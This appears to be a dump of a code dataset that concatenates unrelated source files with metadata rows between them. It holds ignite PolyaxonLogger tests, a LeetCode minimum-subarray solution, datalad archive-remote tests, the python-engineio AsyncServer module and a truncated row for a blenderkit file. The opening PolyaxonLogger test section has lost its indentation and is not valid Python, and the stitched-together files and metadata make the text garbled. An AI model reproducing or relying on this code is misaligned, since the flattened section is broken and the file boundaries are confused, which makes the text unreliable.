mock_logger.log_metrics = MagicMock()
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.log_metrics.assert_called_once_with(step=123, **{"another_tag/loss": 12345})
def test_output_handler_metric_names():
wrapper = OutputHandler("tag", metric_names=["a", "b", "c"])
mock_logger = MagicMock(spec=PolyaxonLogger)
mock_logger.log_metrics = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 12.23, "b": 23.45, "c": torch.tensor(10.0)})
mock_engine.state.iteration = 5
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
assert mock_logger.log_metrics.call_count == 1
mock_logger.log_metrics.assert_called_once_with(step=5, **{"tag/a": 12.23, "tag/b": 23.45, "tag/c": 10.0})
wrapper = OutputHandler("tag", metric_names=["a",])
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": torch.Tensor([0.0, 1.0, 2.0, 3.0])})
mock_engine.state.iteration = 5
mock_logger = MagicMock(spec=PolyaxonLogger)
mock_logger.log_metrics = MagicMock()
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
assert mock_logger.log_metrics.call_count == 1
mock_logger.log_metrics.assert_has_calls(
[call(step=5, **{"tag/a/0": 0.0, "tag/a/1": 1.0, "tag/a/2": 2.0, "tag/a/3": 3.0}),], any_order=True
)
wrapper = OutputHandler("tag", metric_names=["a", "c"])
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 55.56, "c": "Some text"})
mock_engine.state.iteration = 7
mock_logger = MagicMock(spec=PolyaxonLogger)
mock_logger.log_metrics = MagicMock()
with pytest.warns(UserWarning):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
assert mock_logger.log_metrics.call_count == 1
mock_logger.log_metrics.assert_has_calls([call(step=7, **{"tag/a": 55.56})], any_order=True)
# all metrics
wrapper = OutputHandler("tag", metric_names="all")
mock_logger = MagicMock(spec=PolyaxonLogger)
mock_logger.log_metrics = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 12.23, "b": 23.45, "c": torch.tensor(10.0)})
mock_engine.state.iteration = 5
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
assert mock_logger.log_metrics.call_count == 1
mock_logger.log_metrics.assert_called_once_with(step=5, **{"tag/a": 12.23, "tag/b": 23.45, "tag/c": 10.0})
def test_output_handler_both():
wrapper = OutputHandler("tag", metric_names=["a", "b"], output_transform=lambda x: {"loss": x})
mock_logger = MagicMock(spec=PolyaxonLogger)
mock_logger.log_metrics = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 12.23, "b": 23.45})
mock_engine.state.epoch = 5
mock_engine.state.output = 12345
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.log_metrics.call_count == 1
mock_logger.log_metrics.assert_called_once_with(step=5, **{"tag/a": 12.23, "tag/b": 23.45, "tag/loss": 12345})
def test_output_handler_with_wrong_global_step_transform_output():
def global_step_transform(*args, **kwargs):
return "a"
wrapper = OutputHandler("tag", output_transform=lambda x: {"loss": x}, global_step_transform=global_step_transform)
mock_logger = MagicMock(spec=PolyaxonLogger)
mock_logger.log_metrics = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
mock_engine.state.output = 12345
with pytest.raises(TypeError, match="global_step must be int"):
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
def test_output_handler_with_global_step_transform():
def global_step_transform(*args, **kwargs):
return 10
wrapper = OutputHandler("tag", output_transform=lambda x: {"loss": x}, global_step_transform=global_step_transform)
mock_logger = MagicMock(spec=PolyaxonLogger)
mock_logger.log_metrics = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
mock_engine.state.output = 12345
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
mock_logger.log_metrics.assert_called_once_with(step=10, **{"tag/loss": 12345})
def test_output_handler_with_global_step_from_engine():
mock_another_engine = MagicMock()
mock_another_engine.state = State()
mock_another_engine.state.epoch = 10
mock_another_engine.state.output = 12.345
wrapper = OutputHandler(
"tag",
output_transform=lambda x: {"loss": x},
global_step_transform=global_step_from_engine(mock_another_engine),
)
mock_logger = MagicMock(spec=PolyaxonLogger)
mock_logger.log_metrics = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 1
mock_engine.state.output = 0.123
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.log_metrics.call_count == 1
mock_logger.log_metrics.assert_has_calls(
[call(step=mock_another_engine.state.epoch, **{"tag/loss": mock_engine.state.output})]
)
mock_another_engine.state.epoch = 11
mock_engine.state.output = 1.123
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.log_metrics.call_count == 2
mock_logger.log_metrics.assert_has_calls(
[call(step=mock_another_engine.state.epoch, **{"tag/loss": mock_engine.state.output})]
)
def test_optimizer_params_handler_wrong_setup():
with pytest.raises(TypeError):
OptimizerParamsHandler(optimizer=None)
optimizer = MagicMock(spec=torch.optim.Optimizer)
handler = OptimizerParamsHandler(optimizer=optimizer)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler 'OptimizerParamsHandler' works only with PolyaxonLogger"):
handler(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_optimizer_params():
optimizer = torch.optim.SGD([torch.Tensor(0)], lr=0.01)
wrapper = OptimizerParamsHandler(optimizer=optimizer, param_name="lr")
mock_logger = MagicMock(spec=PolyaxonLogger)
mock_logger.log_metrics = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.iteration = 123
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.log_metrics.assert_called_once_with(**{"lr/group_0": 0.01, "step": 123})
wrapper = OptimizerParamsHandler(optimizer, param_name="lr", tag="generator")
mock_logger = MagicMock(spec=PolyaxonLogger)
mock_logger.log_metrics = MagicMock()
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.log_metrics.assert_called_once_with(**{"generator/lr/group_0": 0.01, "step": 123})
def test_integration():
n_epochs = 5
data = list(range(50))
losses = torch.rand(n_epochs * len(data))
losses_iter = iter(losses)
def update_fn(engine, batch):
return next(losses_iter)
trainer = Engine(update_fn)
plx_logger = PolyaxonLogger()
def dummy_handler(engine, logger, event_name):
global_step = engine.state.get_event_attrib_value(event_name)
logger.log_metrics(step=global_step, **{"{}".format("test_value"): global_step})
plx_logger.attach(trainer, log_handler=dummy_handler, event_name=Events.EPOCH_COMPLETED)
trainer.run(data, max_epochs=n_epochs)
def test_integration_as_context_manager():
n_epochs = 5
data = list(range(50))
losses = torch.rand(n_epochs * len(data))
losses_iter = iter(losses)
def update_fn(engine, batch):
return next(losses_iter)
with PolyaxonLogger() as plx_logger:
trainer = Engine(update_fn)
def dummy_handler(engine, logger, event_name):
global_step = engine.state.get_event_attrib_value(event_name)
logger.log_metrics(step=global_step, **{"{}".format("test_value"): global_step})
plx_logger.attach(trainer, log_handler=dummy_handler, event_name=Events.EPOCH_COMPLETED)
trainer.run(data, max_epochs=n_epochs)
@pytest.fixture
def no_site_packages():
import sys
polyaxon_client_modules = {}
for k in sys.modules:
if "polyaxon" in k:
polyaxon_client_modules[k] = sys.modules[k]
for k in polyaxon_client_modules:
del sys.modules[k]
prev_path = list(sys.path)
sys.path = [p for p in sys.path if "site-packages" not in p]
yield "no_site_packages"
sys.path = prev_path
for k in polyaxon_client_modules:
sys.modules[k] = polyaxon_client_modules[k]
def test_no_polyaxon_client(no_site_packages):
with pytest.raises(RuntimeError, match=r"This contrib module requires polyaxon-client to be installed"):
PolyaxonLogger()
| 33.291391 | 119 | 0.718321 |
c65a684360c87ee16131bcefe6b6f9474ef1d602 | 472 | py | Python | two_pointer/209_minimum_size_subarray_sum.py | shawlu95/Algorithm-Toolbox | b6c7b2228d8e70e0842e0bad607533a2c8322cf0 | [
"MIT"
] | null | null | null | two_pointer/209_minimum_size_subarray_sum.py | shawlu95/Algorithm-Toolbox | b6c7b2228d8e70e0842e0bad607533a2c8322cf0 | [
"MIT"
] | null | null | null | two_pointer/209_minimum_size_subarray_sum.py | shawlu95/Algorithm-Toolbox | b6c7b2228d8e70e0842e0bad607533a2c8322cf0 | [
"MIT"
] | 2 | 2020-02-07T20:49:02.000Z | 2020-02-11T06:01:55.000Z | class Solution(object):
def minSubArrayLen(self, s, nums):
"""
:type s: int
:type nums: List[int]
:rtype: int
"""
ans = float('inf')
cum = 0
i = 0
for j in range(len(nums)):
cum += nums[j]
while cum >= s:
ans = min(ans, j - i + 1)
cum -= nums[i]
i += 1
if ans == float('inf'):
return 0
return ans | 24.842105 | 41 | 0.379237 |
edb83aa98de4caded566f15d77faa2a4a6212da0 | 10,667 | py | Python | datalad/customremotes/tests/test_archives.py | jelmer/datalad | fedc04867d87e0191bd500991d0df97e97113457 | [
"MIT"
] | null | null | null | datalad/customremotes/tests/test_archives.py | jelmer/datalad | fedc04867d87e0191bd500991d0df97e97113457 | [
"MIT"
] | null | null | null | datalad/customremotes/tests/test_archives.py | jelmer/datalad | fedc04867d87e0191bd500991d0df97e97113457 | [
"MIT"
] | null | null | null | # emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Tests for customremotes archives providing dl+archive URLs handling"""
from datalad.tests.utils import known_failure_v6
from datalad.tests.utils import known_failure_direct_mode
from ..archives import ArchiveAnnexCustomRemote
from ..base import AnnexExchangeProtocol
from ...support.annexrepo import AnnexRepo
from ...consts import ARCHIVES_SPECIAL_REMOTE
from ...tests.utils import *
from ...cmd import Runner, GitRunner
from ...utils import _path_
from . import _get_custom_runner
# both files will have the same content
# fn_inarchive_obscure = 'test.dat'
# fn_extracted_obscure = 'test2.dat'
fn_inarchive_obscure = get_most_obscure_supported_name()
fn_archive_obscure = fn_inarchive_obscure.replace('a', 'b') + '.tar.gz'
fn_extracted_obscure = fn_inarchive_obscure.replace('a', 'z')
#import line_profiler
#prof = line_profiler.LineProfiler()
# TODO: with_tree ATM for archives creates this nested top directory
# matching archive name, so it will be a/d/test.dat ... we don't want that probably
@with_direct
@with_tree(
tree=(('a.tar.gz', {'d': {fn_inarchive_obscure: '123'}}),
('simple.txt', '123'),
(fn_archive_obscure, (('d', ((fn_inarchive_obscure, '123'),)),)),
(fn_extracted_obscure, '123')))
@with_tempfile()
def test_basic_scenario(direct, d, d2):
fn_archive, fn_extracted = fn_archive_obscure, fn_extracted_obscure
annex = AnnexRepo(d, runner=_get_custom_runner(d), direct=direct)
annex.init_remote(
ARCHIVES_SPECIAL_REMOTE,
['encryption=none', 'type=external', 'externaltype=%s' % ARCHIVES_SPECIAL_REMOTE,
'autoenable=true'
])
assert annex.is_special_annex_remote(ARCHIVES_SPECIAL_REMOTE)
# We want two maximally obscure names, which are also different
assert(fn_extracted != fn_inarchive_obscure)
annex.add(fn_archive)
annex.commit(msg="Added tarball")
annex.add(fn_extracted)
annex.commit(msg="Added the load file")
# Operations with archive remote URL
annexcr = ArchiveAnnexCustomRemote(path=d)
# few quick tests for get_file_url
eq_(annexcr.get_file_url(archive_key="xyz", file="a.dat"), "dl+archive:xyz#path=a.dat")
eq_(annexcr.get_file_url(archive_key="xyz", file="a.dat", size=999), "dl+archive:xyz#path=a.dat&size=999")
# see https://github.com/datalad/datalad/issues/441#issuecomment-223376906
# old style
eq_(annexcr._parse_url("dl+archive:xyz/a.dat#size=999"), ("xyz", "a.dat", {'size': 999}))
eq_(annexcr._parse_url("dl+archive:xyz/a.dat"), ("xyz", "a.dat", {})) # old format without size
# new style
eq_(annexcr._parse_url("dl+archive:xyz#path=a.dat&size=999"), ("xyz", "a.dat", {'size': 999}))
eq_(annexcr._parse_url("dl+archive:xyz#path=a.dat"), ("xyz", "a.dat", {})) # old format without size
file_url = annexcr.get_file_url(
archive_file=fn_archive,
file=fn_archive.replace('.tar.gz', '') + '/d/'+fn_inarchive_obscure)
annex.add_url_to_file(fn_extracted, file_url, ['--relaxed'])
annex.drop(fn_extracted)
list_of_remotes = annex.whereis(fn_extracted, output='descriptions')
in_('[%s]' % ARCHIVES_SPECIAL_REMOTE, list_of_remotes)
assert_false(annex.file_has_content(fn_extracted))
annex.get(fn_extracted)
assert_true(annex.file_has_content(fn_extracted))
annex.rm_url(fn_extracted, file_url)
assert_false(annex.drop(fn_extracted)['success'])
annex.add_url_to_file(fn_extracted, file_url)
annex.drop(fn_extracted)
annex.get(fn_extracted)
annex.drop(fn_extracted) # so we don't get from this one next
# Let's create a clone and verify chain of getting file through the tarball
cloned_annex = AnnexRepo.clone(d, d2,
runner=_get_custom_runner(d2),
direct=direct)
# we still need to enable manually atm that special remote for archives
# cloned_annex.enable_remote('annexed-archives')
assert_false(cloned_annex.file_has_content(fn_archive))
assert_false(cloned_annex.file_has_content(fn_extracted))
cloned_annex.get(fn_extracted)
assert_true(cloned_annex.file_has_content(fn_extracted))
# as a result it would also fetch tarball
assert_true(cloned_annex.file_has_content(fn_archive))
# Check if protocol was collected
if os.environ.get('DATALAD_TESTS_PROTOCOLREMOTE'):
assert_is_instance(annex.cmd_call_wrapper.protocol, AnnexExchangeProtocol)
protocol_file = _path_(annex.path,
'.git/bin/git-annex-remote-datalad-archive')
ok_file_has_content(protocol_file, "VERSION 1", re_=True, match=False)
ok_file_has_content(protocol_file, "GETAVAILABILITY", re_=True, match=False)
ok_file_has_content(protocol_file, "#!/bin/bash", re_=True, match=False)
else:
assert_false(isinstance(annex.cmd_call_wrapper.protocol, AnnexExchangeProtocol))
# verify that we can drop if original archive gets dropped but available online:
# -- done as part of the test_add_archive_content.py
# verify that we can't drop a file if archive key was dropped and online archive was removed or changed size! ;)
@with_tree(
tree={'a.tar.gz': {'d': {fn_inarchive_obscure: '123'}}}
)
@known_failure_direct_mode #FIXME
def test_annex_get_from_subdir(topdir):
from datalad.api import add_archive_content
annex = AnnexRepo(topdir, init=True)
annex.add('a.tar.gz')
annex.commit()
add_archive_content('a.tar.gz', annex=annex, delete=True)
fpath = opj(topdir, 'a', 'd', fn_inarchive_obscure)
with chpwd(opj(topdir, 'a', 'd')):
runner = Runner()
runner(['git', 'annex', 'drop', '--', fn_inarchive_obscure]) # run git annex drop
assert_false(annex.file_has_content(fpath)) # and verify if file deleted from directory
runner(['git', 'annex', 'get', '--', fn_inarchive_obscure]) # run git annex get
assert_true(annex.file_has_content(fpath)) # and verify if file got into directory
def test_get_git_environ_adjusted():
gitrunner = GitRunner()
env = {"GIT_DIR": "../../.git", "GIT_WORK_TREE": "../../", "TEST_VAR": "Exists"}
# test conversion of relevant env vars from relative_path to correct absolute_path
adj_env = gitrunner.get_git_environ_adjusted(env)
assert_equal(adj_env["GIT_DIR"], abspath(env["GIT_DIR"]))
assert_equal(adj_env["GIT_WORK_TREE"], abspath(env["GIT_WORK_TREE"]))
# test if other environment variables passed to function returned unaltered
assert_equal(adj_env["TEST_VAR"], env["TEST_VAR"])
# test import of sys_env if no environment passed to function
sys_env = gitrunner.get_git_environ_adjusted()
assert_equal(sys_env["PWD"], os.environ.get("PWD"))
def test_no_rdflib_loaded():
# rely on rdflib polluting stdout to see that it is not loaded whenever we load this remote
# since that adds 300ms delay for no immediate use
from ...cmd import Runner
runner = Runner()
with swallow_outputs() as cmo:
runner.run([sys.executable, '-c', 'import datalad.customremotes.archives, sys; print([k for k in sys.modules if k.startswith("rdflib")])'],
log_stdout=False, log_stderr=False)
# print cmo.out
assert_not_in("rdflib", cmo.out)
assert_not_in("rdflib", cmo.err)
from .test_base import BASE_INTERACTION_SCENARIOS, check_interaction_scenario
@with_tree(tree={'archive.tar.gz': {'f1.txt': 'content'}})
def test_interactions(tdir):
# Just a placeholder since constructor expects a repo
repo = AnnexRepo(tdir, create=True, init=True)
repo.add('archive.tar.gz')
repo.commit('added')
for scenario in BASE_INTERACTION_SCENARIOS + [
[
('GETCOST', 'COST %d' % ArchiveAnnexCustomRemote.COST),
],
[
# by default we do not require any fancy init
# no urls supported by default
('CLAIMURL http://example.com', 'CLAIMURL-FAILURE'),
# we know that is just a single option, url, is expected so full
# one would be passed
('CLAIMURL http://example.com roguearg', 'CLAIMURL-FAILURE'),
],
# basic interaction failing to fetch content from archive
[
('TRANSFER RETRIEVE somekey somefile', 'GETURLS somekey dl+archive:'),
('VALUE dl+archive://somekey2#path', None),
('VALUE dl+archive://somekey3#path', None),
('VALUE',
re.compile(
'TRANSFER-FAILURE RETRIEVE somekey Failed to fetch any '
'archive containing somekey. Tried: \[\]')
)
],
# # incorrect response received from annex -- something isn't right but ... later
# [
# ('TRANSFER RETRIEVE somekey somefile', 'GETURLS somekey dl+archive:'),
# # We reply with UNSUPPORTED-REQUEST in these cases
# ('GETCOST', 'UNSUPPORTED-REQUEST'),
# ],
]:
check_interaction_scenario(ArchiveAnnexCustomRemote, tdir, scenario)
from datalad.tests.utils import serve_path_via_http
@with_tree(tree=
{'1.tar.gz':
{
'bu.dat': '52055957098986598349795121365535'*10000,
'bu3.dat': '8236397048205454767887168342849275422'*10000
},
'2.tar.gz':
{
'bu2.dat': '17470674346319559612580175475351973007892815102'*10000
},
}
)
@serve_path_via_http()
@with_tempfile
def check_observe_tqdm(topdir, topurl, outdir):
# just a helper to enable/use when want quickly to get some
# repository with archives and observe tqdm
from datalad.api import create, download_url, add_archive_content
ds = create(outdir)
for f in '1.tar.gz', '2.tar.gz':
with chpwd(outdir):
ds.repo.add_url_to_file(f, topurl + f)
ds.add(f)
add_archive_content(f, delete=True, drop_after=True)
files = glob.glob(opj(outdir, '*'))
ds.drop(files) # will not drop tarballs
ds.repo.drop([], options=['--all', '--fast'])
ds.get(files)
ds.repo.drop([], options=['--all', '--fast'])
# now loop so we could play with it outside
print(outdir)
# import pdb; pdb.set_trace()
while True:
sleep(0.1)
| 41.996063 | 147 | 0.665979 |
d090539806149ed4a36670c4b5e0771912fb9384 | 19,303 | py | Python | engineio/asyncio_server.py | StoneMoe/python-engineio | 43f8fb5cd3fefe96768f8a8d91006787fa9c1c19 | [
"MIT"
] | null | null | null | engineio/asyncio_server.py | StoneMoe/python-engineio | 43f8fb5cd3fefe96768f8a8d91006787fa9c1c19 | [
"MIT"
] | null | null | null | engineio/asyncio_server.py | StoneMoe/python-engineio | 43f8fb5cd3fefe96768f8a8d91006787fa9c1c19 | [
"MIT"
] | null | null | null | import asyncio
import six
from six.moves import urllib
from . import exceptions
from . import packet
from . import server
from . import asyncio_socket
class AsyncServer(server.Server):
"""An Engine.IO server for asyncio.
This class implements a fully compliant Engine.IO web server with support
for websocket and long-polling transports, compatible with the asyncio
framework on Python 3.5 or newer.
:param async_mode: The asynchronous model to use. See the Deployment
section in the documentation for a description of the
available options. Valid async modes are "aiohttp",
"sanic", "tornado" and "asgi". If this argument is not
given, an async mode is chosen based on the installed
packages.
:param ping_timeout: The time in seconds that the client waits for the
server to respond before disconnecting.
:param ping_interval: The interval in seconds at which the client pings
the server.
:param max_http_buffer_size: The maximum size of a message when using the
polling transport.
:param allow_upgrades: Whether to allow transport upgrades or not.
:param http_compression: Whether to compress packages when using the
polling transport.
:param compression_threshold: Only compress messages when their byte size
is greater than this value.
:param cookie: Name of the HTTP cookie that contains the client session
id. If set to ``None``, a cookie is not sent to the client.
:param cors_allowed_origins: List of origins that are allowed to connect
to this server. All origins are allowed by
default.
:param cors_credentials: Whether credentials (cookies, authentication) are
allowed in requests to this server.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
:param async_handlers: If set to ``True``, run message event handlers in
non-blocking threads. To run handlers synchronously,
set to ``False``. The default is ``True``.
:param kwargs: Reserved for future extensions, any additional parameters
given as keyword arguments will be silently ignored.
"""
def is_asyncio_based(self):
return True
def async_modes(self):
return ['aiohttp', 'sanic', 'tornado', 'asgi']
def attach(self, app, engineio_path='engine.io'):
"""Attach the Engine.IO server to an application."""
engineio_path = engineio_path.strip('/')
self._async['create_route'](app, self, '/{}/'.format(engineio_path))
async def send(self, sid, data, binary=None):
"""Send a message to a client.
:param sid: The session id of the recipient client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
:param binary: ``True`` to send packet as binary, ``False`` to send
as text. If not given, unicode (Python 2) and str
(Python 3) are sent as text, and str (Python 2) and
bytes (Python 3) are sent as binary.
Note: this method is a coroutine.
"""
try:
socket = self._get_socket(sid)
except KeyError:
# the socket is not available
self.logger.warning('Cannot send to sid %s', sid)
return
await socket.send(packet.Packet(packet.MESSAGE, data=data,
binary=binary))
async def get_session(self, sid):
"""Return the user session for a client.
:param sid: The session id of the client.
The return value is a dictionary. Modifications made to this
dictionary are not guaranteed to be preserved. If you want to modify
the user session, use the ``session`` context manager instead.
"""
socket = self._get_socket(sid)
return socket.session
async def save_session(self, sid, session):
"""Store the user session for a client.
:param sid: The session id of the client.
:param session: The session dictionary.
"""
socket = self._get_socket(sid)
socket.session = session
def session(self, sid):
"""Return the user session for a client with context manager syntax.
:param sid: The session id of the client.
This is a context manager that returns the user session dictionary for
the client. Any changes that are made to this dictionary inside the
context manager block are saved back to the session. Example usage::
@eio.on('connect')
def on_connect(sid, environ):
username = authenticate_user(environ)
if not username:
return False
with eio.session(sid) as session:
session['username'] = username
@eio.on('message')
def on_message(sid, msg):
async with eio.session(sid) as session:
print('received message from ', session['username'])
"""
class _session_context_manager(object):
def __init__(self, server, sid):
self.server = server
self.sid = sid
self.session = None
async def __aenter__(self):
self.session = await self.server.get_session(sid)
return self.session
async def __aexit__(self, *args):
await self.server.save_session(sid, self.session)
return _session_context_manager(self, sid)
async def disconnect(self, sid=None):
"""Disconnect a client.
:param sid: The session id of the client to close. If this parameter
is not given, then all clients are closed.
Note: this method is a coroutine.
"""
if sid is not None:
try:
socket = self._get_socket(sid)
except KeyError: # pragma: no cover
# the socket was already closed or gone
pass
else:
await socket.close()
del self.sockets[sid]
else:
await asyncio.wait([client.close()
for client in six.itervalues(self.sockets)])
self.sockets = {}
async def handle_request(self, *args, **kwargs):
"""Handle an HTTP request from the client.
This is the entry point of the Engine.IO application. This function
returns the HTTP response to deliver to the client.
Note: this method is a coroutine.
"""
translate_request = self._async['translate_request']
if asyncio.iscoroutinefunction(translate_request):
environ = await translate_request(*args, **kwargs)
else:
environ = translate_request(*args, **kwargs)
method = environ['REQUEST_METHOD']
query = urllib.parse.parse_qs(environ.get('QUERY_STRING', ''))
sid = query['sid'][0] if 'sid' in query else None
b64 = False
jsonp = False
jsonp_index = None
if 'b64' in query:
if query['b64'][0] == "1" or query['b64'][0].lower() == "true":
b64 = True
if 'j' in query:
jsonp = True
try:
jsonp_index = int(query['j'][0])
except (ValueError, KeyError, IndexError):
# Invalid JSONP index number
pass
if method == 'GET':
if sid is None:
transport = query.get('transport', ['polling'])[0]
if transport != 'polling' and transport != 'websocket':
self.logger.warning('Invalid transport %s', transport)
r = self._bad_request()
elif jsonp is True and jsonp_index is None:
self.logger.warning('Invalid JSONP index number')
r = self._bad_request()
else:
r = await self._handle_connect(environ, transport,
b64, jsonp_index)
else:
if sid not in self.sockets:
self.logger.warning('Invalid session %s', sid)
r = self._bad_request()
elif jsonp is True and jsonp_index is None:
self.logger.warning('Invalid JSONP index number')
r = self._bad_request()
else:
socket = self._get_socket(sid)
try:
packets = await socket.handle_get_request(environ)
if isinstance(packets, list):
r = self._ok(packets, b64=b64, jsonp_index=jsonp_index)
else:
r = packets
except exceptions.EngineIOError:
if sid in self.sockets: # pragma: no cover
await self.disconnect(sid)
r = self._bad_request()
if sid in self.sockets and self.sockets[sid].closed:
del self.sockets[sid]
elif method == 'POST':
if sid is None or sid not in self.sockets:
self.logger.warning('Invalid session %s', sid)
r = self._bad_request()
elif jsonp is True and jsonp_index is None:
self.logger.warning('Invalid JSONP index number')
r = self._bad_request()
else:
socket = self._get_socket(sid)
try:
await socket.handle_post_request(environ)
r = self._ok(jsonp_index=jsonp_index)
except exceptions.EngineIOError:
if sid in self.sockets: # pragma: no cover
await self.disconnect(sid)
r = self._bad_request()
except: # pragma: no cover
# for any other unexpected errors, we log the error
# and keep going
self.logger.exception('post request handler error')
r = self._ok(jsonp_index=jsonp_index)
elif method == 'OPTIONS':
r = self._ok()
else:
self.logger.warning('Method %s not supported', method)
r = self._method_not_found()
if not isinstance(r, dict):
return r if r is not None else []
if self.http_compression and \
len(r['response']) >= self.compression_threshold:
encodings = [e.split(';')[0].strip() for e in
environ.get('HTTP_ACCEPT_ENCODING', '').split(',')]
for encoding in encodings:
if encoding in self.compression_methods:
r['response'] = \
getattr(self, '_' + encoding)(r['response'])
r['headers'] += [('Content-Encoding', encoding)]
break
cors_headers = self._cors_headers(environ)
make_response = self._async['make_response']
if asyncio.iscoroutinefunction(make_response):
response = await make_response(r['status'],
r['headers'] + cors_headers,
r['response'], environ)
else:
response = make_response(r['status'], r['headers'] + cors_headers,
r['response'], environ)
return response
def start_background_task(self, target, *args, **kwargs):
"""Start a background task using the appropriate async model.
This is a utility function that applications can use to start a
background task using the method that is compatible with the
selected async mode.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
The return value is a ``asyncio.Task`` object.
"""
return asyncio.ensure_future(target(*args, **kwargs))
async def sleep(self, seconds=0):
"""Sleep for the requested amount of time using the appropriate async
model.
This is a utility function that applications can use to put a task to
sleep without having to worry about using the correct call for the
selected async mode.
Note: this method is a coroutine.
"""
return await asyncio.sleep(seconds)
def create_queue(self, *args, **kwargs):
"""Create a queue object using the appropriate async model.
This is a utility function that applications can use to create a queue
without having to worry about using the correct call for the selected
async mode. For asyncio based async modes, this returns an instance of
``asyncio.Queue``.
"""
return asyncio.Queue(*args, **kwargs)
def get_queue_empty_exception(self):
"""Return the queue empty exception for the appropriate async model.
This is a utility function that applications can use to work with a
queue without having to worry about using the correct call for the
selected async mode. For asyncio based async modes, this returns an
instance of ``asyncio.QueueEmpty``.
"""
return asyncio.QueueEmpty
def create_event(self, *args, **kwargs):
"""Create an event object using the appropriate async model.
This is a utility function that applications can use to create an
event without having to worry about using the correct call for the
selected async mode. For asyncio based async modes, this returns
an instance of ``asyncio.Event``.
"""
return asyncio.Event(*args, **kwargs)
async def _handle_connect(self, environ, transport, b64=False, jsonp_index=None):
"""Handle a client connection request."""
if self.start_service_task:
# start the service task to monitor connected clients
self.start_service_task = False
self.start_background_task(self._service_task)
sid = self._generate_id()
s = asyncio_socket.AsyncSocket(self, sid)
s.jsonp_index = jsonp_index
self.sockets[sid] = s
pkt = packet.Packet(
packet.OPEN, {'sid': sid,
'upgrades': self._upgrades(sid, transport),
'pingTimeout': int(self.ping_timeout * 1000),
'pingInterval': int(self.ping_interval * 1000)})
await s.send(pkt)
ret = await self._trigger_event('connect', sid, environ,
run_async=False)
if ret is False:
del self.sockets[sid]
self.logger.warning('Application rejected connection')
return self._unauthorized()
if transport == 'websocket':
ret = await s.handle_get_request(environ)
if s.closed:
# websocket connection ended, so we are done
del self.sockets[sid]
return ret
else:
s.connected = True
headers = None
if self.cookie:
headers = [('Set-Cookie', self.cookie + '=' + sid)]
try:
return self._ok(await s.poll(), headers=headers, b64=b64, jsonp_index=jsonp_index)
except exceptions.QueueEmpty:
return self._bad_request()
async def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
ret = None
if event in self.handlers:
if asyncio.iscoroutinefunction(self.handlers[event]) is True:
if run_async:
return self.start_background_task(self.handlers[event],
*args)
else:
try:
ret = await self.handlers[event](*args)
except asyncio.CancelledError: # pragma: no cover
pass
except:
self.logger.exception(event + ' async handler error')
if event == 'connect':
# if connect handler raised error we reject the
# connection
return False
else:
if run_async:
async def async_handler():
return self.handlers[event](*args)
return self.start_background_task(async_handler)
else:
try:
ret = self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
if event == 'connect':
# if connect handler raised error we reject the
# connection
return False
return ret
async def _service_task(self): # pragma: no cover
"""Monitor connected clients and clean up those that time out."""
while True:
if len(self.sockets) == 0:
# nothing to do
await self.sleep(self.ping_timeout)
continue
# go through the entire client list in a ping interval cycle
sleep_interval = self.ping_timeout / len(self.sockets)
try:
# iterate over the current clients
for socket in self.sockets.copy().values():
if not socket.closing and not socket.closed:
await socket.check_ping_timeout()
await self.sleep(sleep_interval)
except (SystemExit, KeyboardInterrupt, asyncio.CancelledError):
self.logger.info('service task canceled')
break
except:
if asyncio.get_event_loop().is_closed():
self.logger.info('event loop is closed, exiting service '
'task')
break
# an unexpected exception has occurred, log it and continue
self.logger.exception('service task exception')
| 43.183445 | 98 | 0.552298 |
48c34a615dcf24b3bdd52bada31e016aa85968d7 | 10,046 | py | Python | release/scripts/addons/blenderkit/ratings.py | simileV/blenderStereo29 | 09b993449aaca671a9eb2a6a22327246936eb3db | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 1 | 2020-07-20T15:41:58.000Z | 2020-07-20T15:41:58.000Z | release/scripts/addons/blenderkit/ratings.py | ringsce/Rings3D | 8059d1e2460fc8d6f101eff8e695f68a99f6671d | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | release/scripts/addons/blenderkit/ratings.py | ringsce/Rings3D | 8059d1e2460fc8d6f101eff8e695f68a99f6671d | [
"Naumen",
"Condor-1.1",
